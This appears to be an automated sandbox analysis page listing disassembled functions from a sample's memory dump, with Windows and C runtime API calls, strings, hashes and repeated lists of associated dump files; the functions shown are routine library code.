Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID: E-<E
API String ID: 2984826149-3361631808
Opcode ID: 044445b786bdf1009bb5bf32cfa6c26cc53bcb3b37f62da7309248b31d596c4d
Instruction ID: 7e3b7e46772fd718866d399adca8c44010ab4b8c141ff8b09a244d8e21fb329f
Opcode Fuzzy Hash: 044445b786bdf1009bb5bf32cfa6c26cc53bcb3b37f62da7309248b31d596c4d
Instruction Fuzzy Hash: C771B272D30257DBDF319F64CC85BEE7BB9AF09724F188055E908A7191D7709D288BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00252062 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002520AB
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 00252116
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00252133
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00252172
LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 002521D1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002521F4

Strings

E-<E, xrefs: 00252068

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID: E-<E
API String ID: 2829165498-3361631808
Opcode ID: 2df1f6507b5176d9a7f9b69d8f4697d716e18f967c1cd43b450c4bc6d80341a7
Instruction ID: 47808e37d411116cc10719cd1fc90d48ded455f07a7a2a14d5af05b05792d97b
Opcode Fuzzy Hash: 2df1f6507b5176d9a7f9b69d8f4697d716e18f967c1cd43b450c4bc6d80341a7
Instruction Fuzzy Hash: 9E51EEB262021AEBEB218F60CC85FAB7BA9EF41751F108025FD15E61D0D770DD28CB64

Uniqueness

Uniqueness Score: -1.00%

Function 002C1BDF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 002C1CA0

Strings

ext-ms-, xrefs: 002C1C4A
api-ms-, xrefs: 002C1C36

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 72ad04b8960d3b2fb7b5a3b11731df99e1a7ae219965436e4f620dbb2f506671
Instruction ID: a8137051293121a372dcfe187eec1a04569c828b634622bd69beab4bd17aec91
Opcode Fuzzy Hash: 72ad04b8960d3b2fb7b5a3b11731df99e1a7ae219965436e4f620dbb2f506671
Instruction Fuzzy Hash: 5E212B31A90111ABC7229F25DCC2F6A376C9F02360F150726F906A72D2D770EE30C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 002B9C51 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,453C2D45,?,?,00000000,002E3C67,000000FF,?,002B9BB4,?,?,002B9B63,?), ref: 002B9C86
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B9C98
FreeLibrary.KERNEL32(00000000,?,?,00000000,002E3C67,000000FF,?,002B9BB4,?,?,002B9B63,?), ref: 002B9CBA

Strings

mscoree.dll, xrefs: 002B9C7F
E-<E, xrefs: 002B9C66
CorExitProcess, xrefs: 002B9C90

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$E-<E$mscoree.dll
API String ID: 4061214504-3449876888
Opcode ID: 43c99487db25420b129ad037a7210bc18c4c2b6fbf63d03144ca13f3e616c74b
Instruction ID: d135e0e1b6415f40d42bbdc35cfa5aa196770651b45ebe61dcdb5522c3a2192e
Opcode Fuzzy Hash: 43c99487db25420b129ad037a7210bc18c4c2b6fbf63d03144ca13f3e616c74b
Instruction Fuzzy Hash: 4701A23195465AEFDB068F55CC89FEEBBBCFB04B15F000626E811A22E0DBB59910CA90

Uniqueness

Uniqueness Score: -1.00%

Function 002C51C4 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 338
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32(453C2D45), ref: 002C5227
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C5482
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C54CA
GetLastError.KERNEL32 ref: 002C556D

Strings

E-<E, xrefs: 002C51DA

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: E-<E
API String ID: 2718003287-3361631808
Opcode ID: 845fa601876cd5d8ee253715a0a8e853b0a49850f6381e8b955b62f63a903c0e
Instruction ID: c316a22600dcd67191bb2af01c77f96d483bb45938fc57915eec54d395c5b757
Opcode Fuzzy Hash: 845fa601876cd5d8ee253715a0a8e853b0a49850f6381e8b955b62f63a903c0e
Instruction Fuzzy Hash: 9ED169B5D10658AFCB15CFA8D880AADBBB9FF08350F18426EE815E7251D730E991CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00279AD0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00279B07
_ValidateLocalCookies.LIBCMT ref: 00279B98
_ValidateLocalCookies.LIBCMT ref: 00279C18

Strings

E-<E, xrefs: 00279B82, 00279BFF
csm, xrefs: 00279BAD

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate
String ID: E-<E$csm
API String ID: 2268201637-1776045071
Opcode ID: e658e1ab9504792b0176571edad4db40d8b391cf8306d01dc86e3a7269a81cac
Instruction ID: d01fbaffc152a68b8641677685f6d8e1383c6740080e8a152ea8a917e0da1912
Opcode Fuzzy Hash: e658e1ab9504792b0176571edad4db40d8b391cf8306d01dc86e3a7269a81cac
Instruction Fuzzy Hash: 1B41E774920315DFCF10DF68D880A9EBBB5BF45328F14C196E8185B352D731A9A5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002C1E12 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,002C1DAE), ref: 002C1E21
GetLastError.KERNEL32(?,002C1DAE), ref: 002C1E2B
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 002C1E69

Strings

ext-ms-, xrefs: 002C1E4E
api-ms-, xrefs: 002C1E38

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: f70ec65e650245e828b46e0904b0d54d94e05a0410e55e9e652cd4c130104645
Instruction ID: db0fbad5ff47a53d98fe7e5ffed1693b6ecc987685ef4a0d359db9457c130ade
Opcode Fuzzy Hash: f70ec65e650245e828b46e0904b0d54d94e05a0410e55e9e652cd4c130104645
Instruction Fuzzy Hash: 2EF01230694305B7EF111F62DC47F2A3E59AF12B51F144430FE0DE40E2D7A5E9718584

Uniqueness

Uniqueness Score: -1.00%

Function 002D7218 Relevance: 7.8, APIs: 5, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da932ddd3312ea3c9945dc9e9990bcce93398ea898d4abec9dcab704e9c375a6
Instruction ID: 9063d53e16c363c80a01844f9c842f5d74c6598be5011f38e94292d9e18e9f97
Opcode Fuzzy Hash: da932ddd3312ea3c9945dc9e9990bcce93398ea898d4abec9dcab704e9c375a6
Instruction Fuzzy Hash: 0EB16AB0E28246AFDB12DF59D881BAE7BB5FF45310F14415AE800A7392E7749D21CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00315C49 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00315C55

Part of subcall function 00315E2C: __getptd_noexit.LIBCMT ref: 00315E2F
Part of subcall function 00315E2C: __amsg_exit.LIBCMT ref: 00315E3C

__getptd.LIBCMT ref: 00315C6C
__amsg_exit.LIBCMT ref: 00315C7A
__lock.LIBCMT ref: 00315C8A
__updatetlocinfoEx_nolock.LIBCMT ref: 00315C9E

Memory Dump Source

Source File: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction ID: f58939bbc0262ba19bf06a81c89358362402ebb0404418b00b4a7f4278eea767
Opcode Fuzzy Hash: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction Fuzzy Hash: 32F03631945F10DBD62BBFF8A8037CE32905F8C720F114259F4446F5D2CB2459C1CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0028485A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0028466C), ref: 00284867
GetLastError.KERNEL32(?,0028466C), ref: 00284871
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00284899

Strings

api-ms-, xrefs: 0028487E

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: e3f5fc4b4fef1acb99f3271d8f0a97b9c94a922ccf9e4f99e93de1b0bc815118
Instruction ID: 797989fc9ac268a8714247ff490a5a14cf7be1982249e7446bb80df0e7b416d3
Opcode Fuzzy Hash: e3f5fc4b4fef1acb99f3271d8f0a97b9c94a922ccf9e4f99e93de1b0bc815118
Instruction Fuzzy Hash: 5FE04F3029024ABBEF113FA2EC8AB293E59BB10B45F144831F90DE84E0D7E5E8708A45

Uniqueness

Uniqueness Score: -1.00%

Function 002CB49B Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 002CB4A3
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002CB4DB
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002CB4FB

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 0248d861dc6151b7ae0237e60962df977d2d0dfa5d148bfe4e89e44f2206cf85
Instruction ID: a26bf65925a49113ed14926da85d6be62ccc82e4b362b29e13565dba1960941a
Opcode Fuzzy Hash: 0248d861dc6151b7ae0237e60962df977d2d0dfa5d148bfe4e89e44f2206cf85
Instruction Fuzzy Hash: 8911A5F29251157EA6222B719CCEE7F696DCD453E4F544119F405D1241EBB09E2049B1

Uniqueness

Uniqueness Score: -1.00%

Function 002C6D4C Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 002C6D62
GetLastError.KERNEL32(?,?,?,?), ref: 002C6D6F
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 002C6D95
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 002C6DBB

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: b8cac1ebb967f4871843a69f8b28106e4aa4ad3222690f482b0cd6986dcd4ba6
Instruction ID: f7da8331581317169a7af3afe1ddd1f61199e1dfc1bdff3e2407347c7c52eb72
Opcode Fuzzy Hash: b8cac1ebb967f4871843a69f8b28106e4aa4ad3222690f482b0cd6986dcd4ba6
Instruction Fuzzy Hash: D8115771914219BBDF119F65DC48EDE3F79EF00760F104208F825921A0C771CA60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00314B41 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00314B67

Part of subcall function 00314993: __fltout2.LIBCMT ref: 003149BE

__cftog_l.LIBCMT ref: 00314B8D
__cftoe_l.LIBCMT ref: 00314BBF

Memory Dump Source

Source File: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: a9ccfea6fe1c307a01bf31094222b219614dc672f7218f3c772e593e22534d87
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 9A11397200414ABBCF1B5E84CC41DEE3F66BB1C354B598425FA5859521D636C9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 003154C8 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003154D4

Part of subcall function 00315E2C: __getptd_noexit.LIBCMT ref: 00315E2F
Part of subcall function 00315E2C: __amsg_exit.LIBCMT ref: 00315E3C

__amsg_exit.LIBCMT ref: 003154F4
__lock.LIBCMT ref: 00315504
_free.LIBCMT ref: 00315534

Memory Dump Source

Source File: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
